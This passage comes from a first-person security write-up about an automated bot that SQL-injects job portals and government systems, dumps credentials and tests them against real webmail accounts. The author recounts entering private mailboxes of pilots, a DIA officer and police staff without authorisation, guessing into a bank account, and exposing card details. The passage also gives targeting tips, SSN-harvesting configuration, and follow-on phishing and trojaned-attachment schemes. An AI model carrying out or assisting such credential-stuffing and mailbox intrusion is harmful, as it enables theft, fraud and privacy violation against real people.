of fun I prefer as a researcher I've decided to focus back on the goal: the
numbers behind the password matching attack vector. Until the rest of the
day I've been trying to manualy indentify number of matching/not matching
email credential combos, at least for some small part of the entire list.
Approximately 3 on every 10 passwords tested matched.
Some of them needed to be concatenated with '1' or '2' digit (either at the
begin or end of the password), some of had to be shortened, removing the
numerical suffixes (ex: 'bart1969' was the DB password - giving us
additionaly the victims DOB for free - and the simple 'bart' keyword guarded
the email account). Somewhere after the makeshift lunch I've run into a
hotmail account which happened to belong to a Delta Airlines pilot. That was
THE founding that actually changed my mind and let me decide to continue the
project. After quick search through the pilot's mail account I've noticed a
correspondence with the DA's IT branch, containing another pair of
credentials - a private Delta Airlines pilot web account (extranet)
login/password and a link to DA login portal (connect.delta.com), sent by
the IT branch after the pilot began his work for DA.
He didn't deleted the message (and why would he? - after all we all have a
weak memory) leaving it on his private email account - it is not the case
now to wonder why didn't DA provide him with an internal business mailbox
restricted to be accessible ONLY from a safe intranet or using IT provided
asymmetric enc enabled smart-cards, and finally why did they allow sending
such a sensitive information to a private email account. It is however the
case of what online services could have been accessed through the DA
electronic accounts. Let's just say one of the options that the system
provided to a user(pilot) was downloading airport specific security
information and accessing FBI issued documents concerning aerial terrorist
threat awarness.
At the end of that day I've made up my mind: I will not bury the project
after just the first 2 weeks of the research but I'll try to make it grow to
bring up a fully automated code able to perform automaticaly every single
step I've done to get where I was at the moment. The goal was simple: to
find out what numbers 'in the wild' are behind every part of this particular
multilevel attack vector and moreover - what could be its possible
mutations.
Later, the next morning I identified another DA's pilot email account within
the aviation company customer list downloaded the last day, hosted also on
Hotmail. That account also contained the email, sent from IT, with internal
DA pilot account login credentials. Also multiple other FAA's system
accounts were identified, provided for pilot training / career path
developement.
The equation is quite simple: if just one, single system you have ever
logged into (or have account(s) in), by giving it your universal password
scheme AND a contact email, happens to be vulnerable to a database access
attack vector: you may consider any other of your electronic password
protected accounts in different digital systems as compromised - often EVEN
if they haven't been protected by the same secret keyword pattern.
When the attacker gains knowledge about just a nickname/loginname/id held by
the victim to access a heavier protected information system using changeable
password interface (an online bank, business/service online account) it
could be all he needs to compromise the account. Afterall, he knows already
that the person used same password at least twice so it's quite possible he
or she could have used its combination pretty everywhere, isn't it? It is
good however to hear voices of security aware internet forum users
consciously admitting to separate their common passwords into few different
pattern groups: one for home/local computer accounts, another for private
email accounts and finally a different one for most critical accounts, the
ones provided by the office/service and the online financial services.
Additionally it would be a wise practice to try not to connect ANY email
account, either private or business, by the same password pattern coherence.
After all, you can never tell much about the security of the particular web
portal you are about to register a new account in. After inputing your
contact email address needed by the particular service registration process
it is crucial to use a completely different secret word / password scheme
than the one protecting your mailbox. You will sleep better, knowing that
after any possible database compromise in future this will be the first and
the last point the attacker could get while trying to progress in the attack
using information you provided upon the registration.
A good place for an attacker looking for email hijacking/cracking targets
could be job seeker portal databases designed for active as well as retired
military and government service workers. These systems are most often filled
with a highly sensitive information, including SSN numbers bound to detailed
personal info, business email addresses, client provided password/secret
sequences and also officer service performance reports. In fact, this kind
of data make a best suitable target for rather politicaly motivated
entities, producing in turn a cyberterror/cyberwarfare based threat to a
particular government organization or country, than just an another easy
prey for a common electronic fraud criminal.
Looking at the whole case through the attacker's eyes, you could actually
try to make a comparison that a particular vulnerable job portal database is
much similar to a bottle of wine... :)
After penetration has been made, all the compromised email boxes lie opened
on the intruders table. A particular victim that has registered its account
on job portal - after getting the first job / switching it to a better one -
usually advances with its experience and knowledge, leaving however the job
portal account not updated or even sometimes forgets about it. Additionaly,
while the email given in the online registration at the portal is usually
the same email address the victim contacted recruitment office of the new
job - the attacker can easily identify the new victims occupation as well as
any email message forwarded by the victim itself between an old email
address (the portal registered one) and a new business email address. But
since the victim advanced - its personal info importance as well as
professional competency along with scope of digital access have gained on
value - just as an old wine in the 'insecurity basement'. Finaly, right
after opening the bottle, an intruder by simply linking the facts can
"learn" the victim from its correspondence stored on differnet subsequently
opened business/private mailboxes sharing the same password pattern.
Accessing more critical infrastructure accounts belonging to an attacker -
by using either known password pattern bruteforcing or "forgotten password"
reminder services - an attacker can compromise the victim's multiple company
business accounts, reflecting a victim's career path.
An example of Bot pentested job portal system may reveal a little bit the
magnitude of possible compromise impact. A portal - designed by a US based
company explicitly for a retired military and law enforcement officers
looking for a job in a higher (secret/top secret) security clearance
requiring civillian companies - was identified by the Bot to contain an
exploitable server side flaw within the "New Account Registration"
interface. Most users registered there hold or used to hold a military
related career path ending with an officer rank. Often they also hold the TS
security clearance level. The runtime code managed to auto-identify and dump
the email/password combo records within the database (provided at
registrtion by the account owners) and passed them to the bot's segment-3
for further automated password/email matching and mailboxes message contents
analysis.
Among any other penetrable accounts, it was able to gain access to US Army
Lt Col's private Hotmail mailbox.
While holding a "Top Secret" clearance, his last occupation - according to a
detailed unclassified CV stored within the mailbox - was a position of
Branch Chief in the U.S. Defence Inteligence Agency (DIA). You could ask now
of course why a guy holding a security crucial position like this, did use
the same password pattern more than once.
But that's not the point. Everybody uses a password pattern of some kind
just as everybody has a weak memory (especially me).
There are better questions however: why didn't he deleted the message sent
to him by the US Embassy in Paris, containing information on a 6 day
'Ambassador' hotel reservation, that included highly sensitive detailed
payment information. The data within the embassy's message contained a still
valid VISA credit card details used during room payment before the
particular European NATO event, ie. a full 14 digit credit card number, its
expiration date and what's most weird: the sensitive 3 digit security code
(CVV2) needed for any online payment authorization. Much better question
would be: why did the Embassy sent such a sensitive information via an
email, especialy on a private Hotmail account?
And that's just one example.
Out of about 30 thousand stored mail address/password combos on this portal
database, out of 800+ different other db_name()'s stored on the particular
MSSql server and accessible through the flawed ASP interface using the
shared DB user account, out of about 29 different recruitment companies
whoose web systems were found vulnerable to database injection attacks by
the Bot so far.
You do the math...
12. Second Stage Attack Impact And Propagation.
///////////////////////////////////////////////
The mailbox credentials matching attack vector, after just few weeks of
play, became one of the primary subjects of the research. It has been
implemented as bot's Segment-3. The attack vector, employed by S1, S2 and S3
bot segments bound all together, was called for naming purposes simply:
'SIDECAM' (SQL Injection Driven Email Credentials Active Matching).
In theory, after compromising the victim's mailbox password, a malicious
attacker may follow different attack propagation paths, depending strictly
on his goals - being either purely chaotic/destructive, financial or
politically motivated. Just as the motives behind the attack may differ -
the final impact of the SIDECAM based final stage compromise may also vary,
ranging from a sensitive information leak, up to different machine
compromise, ending with secure intranet infrastructure penetration.
The impact of the final 'SIDECAM' attack stage alone (S3) is in fact the
impact of a successful password compromise attack against a particular email
box, either private, business or government provided.
Before launching S3, the gathered Email/Pw pairs were checked against
password frequency. 40 most frequent passwords (ie: passwords harvested by
S2 - NOT the passwords indentified as matching their corresponding email
addreses by S3), within gathered 150K base, sorted by descending frequency,
were:
123456
1234
12345
12345678
password
test
cancer
pass
fringe
drugs
qwerty
mother
summer
sunshine
soccer
654321
abc123
london
monkey
123456789
sparky
111111
baseball
captain
sailing
letmein
freedom
murphy
fashion
maggie
monaco
tigger
1234567
chocolate
dallas
flower
michelle
pain
shadow
1111
When Bot's S3 was able to go operational (after S2 provided it with enough
mail credential pairs) it processed first exactly 16344 email/password pairs
(out of 151595 gathered totally by S2 during its first few week runtime).
The S3 was configured to target only specific free mail provider accounts:
Hotmail, Msn, Gmail, AOL, Verizon, Comcast and EarthLink.
After reaching 16344 processed mailbox credential pairs (ie: ones belonging
to the preconfigured provider pool list), Segment-3 was shut down. It
matched positively exactly 3127 pairs (ie: ones for which the particular
password was successfully opening its corresponding email account, accepted
either by providers POP3/IMAP4 mail server or through S3 implemented HTTP/S
webmail login interface parametric proxy).
The final "password reusage factor" (PRF), visualizing level of universal
password usage among the internet users, oscillated through runtime around
0.15 - 0.24 (shortly speaking: aprroximately 1 on every 4-5 processed email
owners use the same password scheme for its digital, password protected
accounts). Then, it should be also mentioned, the PRF's oscilation amplitude
through the runtime depended at most on 2 factors: the type of the system
(its infrastructure criticality level, expressed directly in the trust that
the users have to the system) and the age of the particular S2 compromised
system (the age of the most recent account created).
The reasoning behind the second factor is rather obvious - for a 10 year old
portal / web system account we have far lower probability to that the Em/Pw
combo will still match (it is more probable that the the password has been
already changed after a compromise (or as a result of users security
awareness increase) or the account was abandoned / deleted).
The first factor expressed itself most evidently in the case of the
vulnearable U.S. Department of Justice system. The users here were in most
US Gov officials, being usually a law enforcement workers. The highest PRF
factor (around 0.24) was noted in this particular systems case - the highest
number of Em/Pw combos were found matching by the S3.
Later, apart the free-email-provider S3 runtime, a different S3 test case
was executed (one, targetting non-free gov provided email account passw
matching). It resulted accessing multiple email accounts, belonging in most
to PD officers and Sherrif Dept officers. It's unclear however what was the
true factor behind the numbers in this particular system case - whether they
were a result of some kind of "reckless distance" a gov worker has to its
job ("I don't need to care for every single digital account gov gave me,
until it's not my bank account") - which however, in this specific systems
case (DoJ) would be somehow ironic - or rather completely the opposite:
"while I'm registering the account and entrusting my personal ID and
password in the hand of gov department that handles peoples security, how
would it possibly be unsafe and opened to a compromise? - ie: my universal
password is safe here."
Finally, the runtime results were corelated and compared, showing PRF
factors for each separate email provider.
ProcessedHotmail = 7070
ProcessedMsn = 792
ProcessedGmail = 3750
ProcessedAOL = 2625
ProcessedVerizon = 308
ProcessedComcast = 996
PositiveHotmail = 1664
PositiveMsn = 184
PositiveGmail = 386
PositiveAol = 490
PositiveVerizon = 45
PositiveComcast = 189
HotmailPosFactor = 0.23
MsnPosFactor = 0.23
GmailPosFactor = 0.10
AolPosFactor = 0.18
VerizonPosFactor = 0.14
ComcastPosFactor = 0.18
Although in my opinion EXTREME CAUTION should be taken before drawing any
real conclusions based on theese numbers, there is at least one thing
drawing attention: over twice as much statistical users with positive
password reusage match for Hotmail and Msn (while treated as two different
test groups, amazingly, they resulted with the same, highest PRF factor,
both being corelated by their mutual service provider, ie. Microsoft) as
statistical Gmail users with positive password reusage match.
There are also questions concerning reasoning behind some protections,
either security or commercial based, implemented by particular email
providers. Gmail and Hotmail, for this example, have well implemented
captcha solution, to verify if the following mailbox auth attempts are
driven by human (ie: from security reasons). However, if one chooses a POP3
protocol based mail synchronization, free accessible there for anyone, he
can easily execute an automated robot code.
In the Yahoo! Mail case, we deal with an opposite situation - since there is
no free POP3 mail server available to Yahoo Mail free service users, just a
commercial solution called "Yahoo! Mail Plus", there is no easy way to
complete an automated POP3 driven password match (when we try and use a POP3
mail server using particular free-mail Em/Pw pair we will result with
AUTH-FAILED error, just as the account/password given wouldn't match -
however when accessed through a yahoo's webmail interface - we could be able
to log-in successfuly). Since the Yahoo Webmail interface doesn't implement
any captchas, one could easily execute an automated credential matching code
just by implementing a HTTPS webmail proxy wrapper.
The second part of this section was focused on the successful SIDECAM attack
propagation - what could happen AFTER the hostile succeeded with breaching
our mailbox. Since the further exploitation paths, succeeding unauthorized
email access, are limited just by an attacker's imagination, we could give a
try and sketch few most probable courses of action for a hypothetic
intruder.
The very first thing an arbitrary attacker would probably do after breaching
the victim's mailbox is enumeration of any other accounts and systems that
the victim has the access to. One good way to do this would be simply using
the webmail 'message search' features and looking of any message containing
words 'password', 'account' or 'login' - theese emails will either contain
different system registration confirmation credentials, password reminder
data or any additionaly details revealing the existence or other electronic
accounts belonging to the victim (social portals, job portals, business or
service restricted systems, web admins / web developers FTP credentials,
etc..).
After enumeration of the less critical, low security system accounts (the
ones which credentials were either already stored wihin the mailbox or could
have been retrieved successfuly using just their login/id and apriopriate
send-password remider services), the attacker may focus on stronger
protected system accounts, like online banking accounts and electronic money
operation systems.
Lets look at the facts here.
Todays well designed financial assets operations system is a fortress. Or
should we rather say: it is meant to be a fortress. Most probably, it would
be one, if both - its defense system operators and its clients - were
robots.
In the real world however the security of a particular fincial's system
client depends STRICTLY on his security threat awarness and - what's far
more important - on the threat imagination he managed to develope.
Lets take a look for example at a common, well secured online account,
facing a possible related email's credentials compromise. The particular
online bank provide the account's owner with brute force attempt
protections, newer allow to send any sensitive data to related email address
(so the attacker couldn't just simply "email-remind" the account's
credentials), employes 2- or 3-level password authentication mechanisms,
separately for cash and non-cash operations (including one-time passwords
and SMS transaction authorization) and finally harden the password
forgotten/reset operations with different ID information challenge-response
reqests.
But as usual, there is one tiny issue in the whole case - no matter how hard
a security specialists would try, we are just humans - not robots.
Quite often the ammount of ID data embeded within correspondence and
different sensitive documents found after Bot's reconaissance done on a
particular mailbox was all the intel the malicious attacker would need to
perform the bank account password reset. SSN numbers, DoB's, addresses,
phone numbers, detailed health and service reports, even a secret
question/answer (universal as well) combo - could have be found on the
victims mailbox and through it - either within sent and saved CV documents,
detailed cover letters, business correspondence or the account
configuration. Also the SMS authorization services can be diverted (by
resetting/changing SMS number), using the info the attacker could have
acquired after the mailbox breach.
Finally, what could have been "noticed" during the research, in different
cases the particular person used its universal password sometimes four times
and more, in different places (including the email password), in one or
another form (often concatenating with a number '1' to meet the particular
password policy's requirements) - so it wasn't also much surprising to find
that in few cases the very same password protecting mailbox was also
protecting the particular user's online bank account.
Most surprising however, instead of all the warnings from the banks
correspondence disclaimers, was to find at user's mailbox a self-forwarded
message containing either partial or full credentials (UserID/Pw) to access
a particular web bank account. Even better: one particular person have made
an email folder named 'my passwords', where he did stored all the "needful"
sensitive info, including Paypal IDs and aviation portal / systems accounts
(he was a pilot). It seems that the one thing distinguishing a human from a
robot is most definitely a weak memory.
The easiest (but less subtle) action an attacker could perform is email
account hijacking (changing its password, secret question and answer).
Although it's probably the last thing to do if one wants to keep the
account's credentials compromise undetected for as long as possible, it
could make a successful tool for further blackmail and extortion attacks.
Finally lets not forget about the spam robots and automated email spoofing.
I agree: remote machine hijacking, using malware and exploitation of the
physical access to victim's email account data along with its contacts
stored within the host machine email client - is one of the most often ways
for spammers to obtain both: spam zombie robots and a valid email account
credentials. But I guess not the only one.
Accounts compromised after an automated SIDECAM attack can make as well an
effective fuel for any kind of spammers.
Browsing through a compromised's sherrif department mailbox belonging to a
IT Division Chief (after completed SIDECAM phase on the mentioned earlier
one of vulnerable Department of Justice systems), I've spotted a message
describing a recent incident involving spam being sent from one of sheriff's
dept email accounts. It cautioned the SD's users ONLY for rechecking proper
AV settings when operating from home machines. However if the leak source
was not the malware infection of the government worker home machine, but a
similar SIDECAM-like attack on DoJ - reinstalling an AV or even setting up a
new clean version of OS wouldn't make a difference for the attacker who
targeted the particular sheriff's department account through the attack, as
the source of the email credentials compromise was both: the leaky DoJ
system and the password reusage vulnerability.
The previous example introduces second, far more interesting group of
attacker's courses of action, involving social engineering mechanisms and -
unlike the spambots - targetting precise, high value targets (chosen by a
specific profile attacker, being for example financialy or politicaly
motivated).
Since this type of attack to be successful requires from an attacker a
proper study of the victim's profile (by using for example the info gathered
from its correspondence and social portal accounts), it cannot be automated
(I mean: at least until 2029 you will need a human to deceive a human :)
Lets focus at start on an attack employing spoofing of identity of
compromised email's account owner (lets call him: "victim1") and targetting
specific person ("victim2") from the breached mailbox's contacts list.
A hypothetic attacker, after checking victim1's contacts (by either
analysing mailbox contents downloaded using POP3/IMAP or simply accessing
the contacts list using the particular webmail interface) will begin with
building a personal identity pattern for the victim2 including every piece
of info he could found: what he/she likes, which web type of sites it visits
(has accounts in), current and previous occupation, interests/preferences,
what kind of information is exchanged between contact and mailbox owner,
what is the highest priority matter to victim2 at the moment, and so on.
Following that, an email must be forged employing stolen identity intel,
containing as much personal data as possible to render the message credible.
The attacker's goal will be to urge the remote mailbox owner (victim2) to
response "positively" (according to the attackers objectives), either by:
- visiting attacker controlled web site hosting malicious remote attack
code,
- launch attached script/binary,
- reveal a sensitive information.
The possible impact of such attack is obviously compromise of victim2's
client machine and sensitive information access.
A specific mutation of this attack vector, not demanding from the attacker
however execution a successful password matching SIDECAM attack, could be
exploited in so called "spear phishing" scheme. It involves a phishing
attack with one major difference to common phishing - the fact that the
attacker already knows that the owner of every email address within a
spammed list is in possession of the account in the particular system
(social portal, online banking system, particular corporation's employee
restricted system), account that the attacker is interested of. After
properly researching the targeted organization the attacker will target the
precise account type.
Note, that this attack may be launched by an arbitrary attacker after any
successful database email records harvest, especialy when neither Login nor
Password data could have been retrieved successfuly by the attacker (were
properly one-way encrypted for example) and just bare email list and maybe
some basic ID data was retrieved (like name, phone or address) - this kind
of data is all the attacker needs to forge a trustworthy, credible message
pattern and execute a spear phishing attack, targetting for example
Login/Pwd account combos of the particular system.
Another kind of possible email breach exploitation (either SIDECAM based or
not) would be inverted (in reference to previous example) identity spoofing,
ie. the case when the attacker while spoofing some other email identity (for
example one of victim1's contacts - ie. victim2 in the previous example)
sends a spoofed message to a controlled (breached) victim1's mailbox,
exploititng the intel gathered so far through the victim1's email access.
After forging a credible, detailed message, an attacker can execute social
portal credentials phishing, bank account phishing, aim for victim1's
sensitive data (ID data/business secrets/service related confidetial data),
spoofing victim1's company representives (anyone with high enough rank,
found in contacts or by email analysis) or execute remote execution attack
by sending malware of any kind the mailbox server operator won't filter out
(executable / document embeded 0day) authenticating the message with intel
gathered so far on either victim1 or its spoofed contact, victim2.
Possible impact: compromise of breached mailbox owner's machine (victim1's).
A specific subtype of the above attack type would be the "active
conversation interception". In this scenario an attacker, basing on the
mailbox event tracking (analysing any newly opened conversations, awaiting
answers to victim's question/topic) will try to intercept
(detect/read/delete) any possibly high priority message (answer awaited by
the mailbox owner - victim1) forging and sending a spoofed message inducing
victim1 to either share sensitive information or reponse by executing
(opening) a malware (exploit) attachment. The more is the conversation
valued to the victim - the higher the probability of successful attack.
Most expected to be exploited using this kind of attack would be for example
resume (CV/cover letters) sent to a remote company and awaiting response,
conversations with old colegues and family members (but only those for whoom
this (email) is the only way of communication with victim), a job offer from
registered job portal (since its most probable the attacker will gain access
to the job portal using already known victim1's universal password - he will
also be able to monitor any events within the victim1's job portal profile,
so any messages FROM the portal after profile updates can be expected high
priority to victim1), etc.
Another example would be execution of ID phishing attack, spoofing any
actively (currently) used job portal mail account, with message containing
link to an attacker controlled ID-data-phishing web site and requiring
additional, sensitive ID data (service reports / current job involved
projects / etc) giving false impression of having possibly attractive and
available job offer.
Certain mutation of that attack scenario would be a phishing attack
targetting credit card data.
After noticing that the victim has a credit card in his possession and
recently used it in any online shop (by looking for any possible shop's
response email messages on victim's mailbox containing succesful purchase
notification), after interception of the message (deletion) an attacker can
begin a phishing attack and imitate a shop's CC data update website, similar
to one that the user has previously registered his card in, requesting CC
data update, motivating the operation with ex: security reasons and victim's
shop account validation.
The last interesting way to exploit the unauthorised email account access
that I've came across during the project was self forwarded attachment
overriding.
The idea appeared after accessing an email account belonging to a Victoria
Police Department computer forensics detective. Among investingation
reports, forensic software FTP account data, and other, service related
messages, my attention dragged a recently self forwarded message containing
a zipped instalation version of a cell phone forensics software.
While the only reason of forwarding the installation binary to myself (it
happened to me few times) is to be able to quickly setup the software on a
clean machine in new place with just the internet connection - there was a
quite reasonable assumption that the file would be used (remote executed) in
the nearest future.
An attacker could exploit that fact and after replacing the recent message
with one containing altered attachement, ie: the same software installer
combined with a trojan code.
The resulting impact would be compromise of any machine that the victim1's
would install the attached program on.
Apart the particular example, any properly conducted, sophisticated social
engineering attack exploiting a compromised police department email account
may also result with infection and further penetration of police department
secure intranet system.
Note: spoofing driven attacks may most likely after relatively short time
trigger a response message from the target to person which identity has been
spoofed, with questions about the suspicious message (assuming only that the
person is highly aware of common security threats), which in turn will
result in uncovering of the attack, and most likely of the mailbox
compromise as well, triggering further actions by the victim such as
compromised machine cleanup. Therefore attackers time-window to utilize
compromised system will be relatively small.
Lets also not forget that a properly designed, EXTERNALY (internet)
accessible webmail interface should provide every account holder with
mailbox login-event IP/Date tracking features, accounting at least few
previous logins, (Gmail would be one good example of such proper
implementation).
On the other hand - finding the "source" (eg: a particular credential
information leak source) of victim's mailbox password compromise is a
difficult task.
After the problem has been signaled, even if one can assume the compromise
source was SIDECAM-like attack, it would be hard to point out quickly a
precise system that after being successfully attacked using SQL Injection
(or any other data-targeted attack) has become the source of the sensitive
information leak. The particular victim could hold many accounts in
different systems - systems that could be old enough to hold multiple,
different type vulnerabilities.
The affected person might have also forgotten about some of the system
accounts long time ago (it happened to me few times actually), accounts that
are still active, or even hadn't been logged into once, trespassing theese
systems just to "check&leave" there his most precious sensitive information
(universal password for example). After some of more critical system
accounts are compromised it may be sometimes practicaly impossible to track
the origins of the particular victim's password data leak.
I should mention at the end, that all the presented attack patterns above,
belonging to the second group of attacks (attacks involving social
engineering) are THEORETIC SCHEMES ONLY, and haven't been executed by me in
any real situation during project time.
13. Teaching a robot how to "value" its victim.
///////////////////////////////////////////////
Since the 'SIDECAM' attack vector is an example of a randomized-victim
attack type, to gain most valuable results, an attacker must focus on
creating a proper parametrization of its code: he must design it in such
way, it could target ALONE, elasticaly described, most valuable critical
infrastructure points.
This is all the game of probability and time.
For the SIDECAM attack vector, the point is to generate (for example) google
search query patterns derived from easily enough configurable regular
expressions, describing internet system interfaces like for example job
portals, retired officer portals or any social web application systems
provided for critical infrastructure workers - the places where most
experienced people stored willingly their email/password data, unaware of
the threat.
The strength of this attack vector (assuming a randomized-target attacker),
is based on the access level given to an attacker by the sensitive data he
can obtain afterwards, using all the intel and credentials gathered after
breaching the particular victim mailbox. The more sophisticated victims
occupation / higher security clearance / more experienced person - the
bigger the final attack impact.
Probability works fine in real - after stumbling for few days upon a
different US .gov domain systems, the bot identified a vulnerable Texas'
Department of Justice database system developed to support a different US
DoJ workers with criminal backgroud checking service. The vulnerability
existed in a 'password reminder' interface. As it could have been predicted,
most of the registered users there were law enforcement services workers. A
30000+ user account records MSSQL database were then enumerated and
selective-dumped, targetting auto-identified login/password/email records.
The final scanning stage was the segment-3's job. It performed automated
password validity matching for the selected email/password combos.
The major part of the DoJ's system accounts were registered by the law
enforcement representatives, that presented their official gov-provided mail
account addresses upon the registration. Now, since most of the properly
designed government and military information systems should provide access
to an email services ONLY from machines belonging to an internal institution
network (intranet), it is impossible to connect to their login interfaces
"from outside" or without presenting a valid VPN/HTTPS certificate issued by
the CA either for the precise user's machine and secured localy by MS's
DataProtection API or carried by the user on his/her smartcard.
But again: 'most' doesn't make 'every' :)
Relaying again on our new best friends - probability and automation - all we
need is to properly identify whether a particular mail gov-domain support
some external POP3/IMAP server or if it provides any external webmail
interface. The most often used HTTP/S mail domain prefixes/suffixes found
were: 'mail','webmail', ,exchange', 'owa' and 'email'.
The results that came up after a day of work or so, were lets say, at least
somewhat unexpected. Several police department and sheriff's department
email accounts were matched as accessible (DoJ system presented password was
reused). The email accounts were provided by either US or Canada government
and included: a deputy sheriff detective, police dispatchers, a computer
forensics detective, narcotics division detective and information technology
division chief.
14. Passwords, secrets and the pain of hashing.
///////////////////////////////////////////////
Every 9 on 10 systems that were found vulnerable to ASP/MsSQL SQLi attack by
the Bot, while holding some form of user password, did not encode the
sensitive values or hash them in any way, storing them in a plaintext, using
either 'varchar' or 'nvarchar' SQL type fields.
Less than 5% of compromised systems just encoded sensitive information,
using mime64 algorithm in most cases, rendering sensitive data easily
reversible after the DB attack. It was really nice to find manualy once a
time a secure websystem welcoming the user on the 'new account submission'
page with message like this:
"For security reasons, your password is stored in an encrypted state in our
database, which prevents the system (or anyone else) from reverse generating
your password."
The only way to protect a user provided sensitive data - not only from
remote attackers, but also from the malicious insiders - is to use strong
enough, one way, collision resistant encryption algorithm, commonly known as
hash function. Using up to date hash methods (like SHA-2 for example)
protects the user before any sensitive data leak, caused wheather by a
remote intruder breach, authorized employee malicious action or accidental
data loss.
Probably the most obvious reason behind this "pain of hashing" reflecting
the numbers, is the kindness and generousity of corporation's programmers to
support lost users with the extraordinarily powerful feature of password
reminder.
But, seriously.
I can not speak of if "password reminder" option is simply GOOD or BAD -
it's not black or white.
But this is a bad policy.
The only thing I could speak of, to be objective, is that the option
implemented for the "users good" is far less secure than its completely
reasonable alternative - password reset feature. At first - user password
plaintext data may be harvested (and decoded) as a result of SQL Injection
compromise of the vulnearble corporations database. Secondly - the password
may be intercepted/retrieved by any attacker who gained access to victm's
email account credentials (exploititng for example a successful SIDECAM
attack result data). And finally - after breaching a users mailbox account,
attacker can exploit "password reminder" features of ANY particular system
that the victim has been registered to and take control of the accounts.
The existence of a password reminders service is in fact a real evidence
(and the only one the attacker would need) for that the web application
doesn't use any type of sensitive data (password) hashing but stores the
data as a plaintext (since for the properly constructed hashing algorithm
there is no (mathematic) way to "recover" the hash operation input argument
from the result value).
Going further - in my opinion, at no point to be honest, should be a user
given the option to provide the remote, critical assets system (like an
online banking or a official government mailboxes) with ITS OWN password,
neither during account registration nor at password reset operation. We are
just humans and human doesn't execute every single policy given, as robot
does with the scripting code. The password may be to short, it may lack of
randomness (be vulnerable to brute-force attack) and most of all - after
possible compromise of the database system it may reveal to much information
about the "cryptographic inner" of the user. Very short, dictionary based,
character only password would for example indicate either users's
recklessness or his unawareness of security threats.
Lets take a real life password example: 'susan1'.
The password has been found to be matching the coresponding email address,
using SIDECAM attack vector by S3. The password indicates 3 things: first,
that owner likes susan :) second that most likely he is a male and finally
most important to an attacker - that (in this specific example) he
intentionally concatenated word 'susan' with number '1' without being told
to do so by the remote system (the particular system's password policy
(email portal) didn't enforced the user to use numbers or special
characters) which leads us to a conclusion that the user is:
1. Aware of the password complexity attacks and could have used the hybrid
password to protect one of his more critical assets ie. his mailbox.
2. Uses still approximately short password most probably to easily memorize
it.
That all together indicates that the user's "security fraze pattern" was
used to lock his "things" in more than just one place and it could to be
expected (with a reasonable probability) a combination of word 'susan' and a
digit most likely ranging between 1-5.
After about an hour of getting known the user better while talking with
susan1, 2 other accounts could have been accessed - user's second mailbox
password was pattern-bruteforced and verified to be also the keyword
'susan1' and the online bank account used (first level of authentication
only / non-cash operations) by the user was identified to be protected by
the password 'susan3'.
Another real life example - a Mensa Poland member's emailbox, accessed by
the Bot was noticed to be protected by the password 'dupa' (meaning: 'ass',
in Polish language). The conclusion here however was slightly more
difficoult than in the previous example. The best I could have came up with
was: the higher the IQ the stranger the password is ...
Definitely the most ironic case however was the AOL's user, who had chosen
to protect her electronic accounts (including the one within a buggy, SQLi
targeted portal) along with her AOL email account all together using the
same password: 'idiot1'.
The unencrypted password records stored at the vulnerable database should
not be considered afterall as the most critical user's asset to be
protected. Giving the Bot's gathered system examples, many of them contained
other sensitive data type stored in plaintext - secret questions and
answers.
Analysing SIDECAM opened mailboxes, an attacker already knows that the user
used the single well memorized password in at least two different places.
With a reasonable assumption that the mailbox owner uses also similar
"secret question" / "answer" strings for stronger protected systems and with
the help of additional personal information like DoBs, addresses, phones or
even SSN numbers stored within victims mailbox documents (CVs attached to
job emails are true personal information mines) - an intruder can try to
conduct a successful attack against strong protected victim's accounts that
the attacker is already aware of, after study of the victim.
15. Parametric Data Objectives.
//////////////////////////////
To be able to "tell" the bot which type of data within every penetrated
database system we are interested in and which is unimportatnt, a simple
mechanism has been implemented to describe it - "Parametric Data
Objectives". The idea is to bind the public parts of the targeted data with
its corresponding private values. For example if we'd like to tell the bot
to look for any ID Data containing specific secret element (say a SSN
number) we describe it defining a list of string-patterns both for the
public and private part. We define a DOP scheme by NAME and then describe
the lists of Key and SubKey strings to follow this pattern (ie: contain one
of the Key/SubKey words)
Example from config:
Key = ssn ss_n ssan social_security socialsecurity
SubKey = email name tel addr phone dob year ammount number date time code
user country
The whole idea is that data keys must be bound to at least one subkey -
without it accessed data has no value for a particular attacker. Lets say we
are interested in any table containing Password/Email columns - we need to
tell the code how a login column name could look like and moreover - what
different column should it be bound to to, to be valuable. Therefore even if
the robot manage to find the email records within the penetrated system, but
can not match them with corresponding passwords values (cannot locate
related password column by either name or contents matching) or secret
data - it is useless to him as long as it employs SIDECAM vector only (seeks
for automated email account breaching).
For an attacker, there is however a different possible area to exploit
separate email address records, not bound to plaintext passwords: Spear
Phisihng.
Utilizing SQL Injection attack vector as the first stage of a Spear Phishing
attack is in fact a book example.
Despite the mechanism to describe the "priority data" pattern (DOP at Bot's
Segment-2), there was also second pattern-description-mechanism developed
(at Seg-2) to parametrically define the most crititcal systems (like
military, gov, financial, health, energy, IT, etc.) within which to search
vulnerabilities for and to distinguish them from less critical
infrastructure.
16. Robot Hits His Postgrade Education.
//////////////////////////////////////
Before the next Bot's version, that implemented additional solutions like
Data Objective Patterns could have been launched it needed a proper training
of course :)
However it was a month or two already since the last bot's live
reconnaissance and "hunt" for vulnerable systems, so I've figured out that
it was a great time to find out how much of database systems initialy
matched as vulnerable have been already patched (without, obviously,
noticing the company/organization about the fact of vulnerability existence
in any formal way).
The first thing I've done was to setup DOP to harvest every
login/email/password triplet recognized as well as any personal ID data
(address, phone, DOB, etc.) bound to SSN numbers.
Then I cleared the 'done' flag for the same security / private investigation
company mentioned earlier (the one the second Bot's version utilized as
training ground for the automated penetration testing) and launched the
robot.
Basing on the output data gathered by the previous version of Bot the
company database held about 30 employee records containing private SSN/ID
data and few houndred of client records with email/password/login combos, so
the new bot's automation should have performed successfuly without any human
supervision, recognizing these data entries as matching against configured
DOPs, performing an automated data harvest.
But it didn't...
The penetration stopped at the vulnerablility matching procedure - it seemed
that the company have patched the hole.
Anyway - since an automated code's console printout is not enough to confirm
if the hole in my favourite security training :) company indeed have been
patched (I could simply have made ton of bugs in the new bot's code, so it
could just be malfunctioning) - I needed to check it myself using an
oldschool script-kiddie ninja techniques. It came out the vulnerable Html
FORM indeed have been fixed, but since the Bot doesn't have implemented any
sense-of-humour recognition algorithms (yet...) it obviously missed one
precious detail of the company's patch.
Previously, if the user would have forgotten his credentials for example,
the login interface would warn him, using big red font, that "The provided
password is incorrrect". Now, the fix for the SQLi bug consisted entirely of
writing an input parsing procedure that checked if the user input data
contained either 'select' or 'union' SQL words (the words that were SQL
injected a month ago into the very same database something like 5 times a
second, for about few days while "training" the bot). The stunning part was
the coded-in response of ASP programmers for the recognized SQL word
patterns. After using either "select" or "union" keywords in the
Login/Password fields, right in the place of common incorrect-password
warning message, with the same big red font, we were given now a big red:
"GO AWAY!"
